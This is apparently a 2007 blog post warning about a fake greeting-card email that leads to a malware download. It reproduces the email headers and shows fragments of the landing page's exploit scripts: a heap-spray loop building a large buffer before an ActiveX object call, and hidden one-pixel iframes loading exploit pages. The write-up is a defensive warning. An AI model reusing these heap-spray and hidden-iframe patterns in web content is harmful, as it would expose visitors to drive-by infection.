Monica—To view this greeting card...

This is a new way to send people a virus. The good thing (if I may say) is that the virus does not get directly in your mailbox. But people who follow the link thinking: wow! I received a card, certainly do see a card at the end. But it is a virus. This only affects MS-Windows (big surprise) but hey... it's still is a virus. What kind, I don't know and it really doesn't matter to me. Just watch out for yourself!

Note that I removed the incoming email since it can very well be a legitimate email address that the virus used to email me.

Return-Path:		<???>
Received:		from (colo [])
			by (Postfix) with ESMTP id 099641BDE2
			for <>; Sat, 16 Jun 2007 11:25:37 -0700 (PDT)
Received:		from ( [])
			by (Postfix) with SMTP id F1D7226ACFA
			for <>; Sat, 16 Jun 2007 11:25:26 -0700 (PDT)
Received:		from uijg.paix ([]) by with Microsoft
			SMTPSVC(6.0.3790.1830); Sat, 16 Jun 2007 13:22:22 -0500
Message-ID:		<002d01c7b043$4859f1a0$7e9f995e@uijg.paix>
From:			"Monica" <???>
To:			<>
Subject:		Monica sent you a! Greeting
Date:			Sat, 16 Jun 2007 13:22:22 -0500
MIME-Version:		1.0
Content-Type:		text/plain; format=flowed; charset="Windows-1252"; reply-type=original
X-Priority:		3
X-MSMail-Priority:	Normal
X-Mailer:		Microsoft Outlook Express 5.50.4133.2578
X-MimeOLE:		Produced By Microsoft MimeOLE V5.50.4133.2578

Surprise! You've just received a! Greeting
from from "Monica" ()!

To view this greeting card, click on the following
Web address at anytime within the next 30 days.


The! Greetings Team 

When following the link, I get this index page:

Download should start automatically. If you experience any problems, please try using
the <a href="">direct link</a>.

The unescape have been shorten here because these are quite long. The result is pretty evident since you are offered to follow the direct link to that fun.exe virus.

The first script goes like this:

		y=y.substring(0,0x3ffe4-x.length);o=new Array();for(i=0;i<450;i++)o[i]=y+x;
		document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"><\/object>');

This script makes absolutly no sense. So why such a script? Well... the one main thing I can see in that script is a cheer size of the buffer generated by the while(y.length < 0x40000). This is big and it is not unlikely that this plus the array generate the execution of unwanted code when the script access the length of the createControlRange() function. Anyway, I won't try it!

The second script creates frames as follow:

<iframe src="exp1.htm" width="1" height="1"></iframe>
<iframe src="exp2.htm" width="1" height="1"></iframe>
<iframe src="exp3.htm" width="1" height="1"></iframe>
<style> * {CURSOR: url("123.htm")} </style>

I tried to get the 123.htm entry wondering what that cursor could possibly look like. I got a Error 404: Not Found.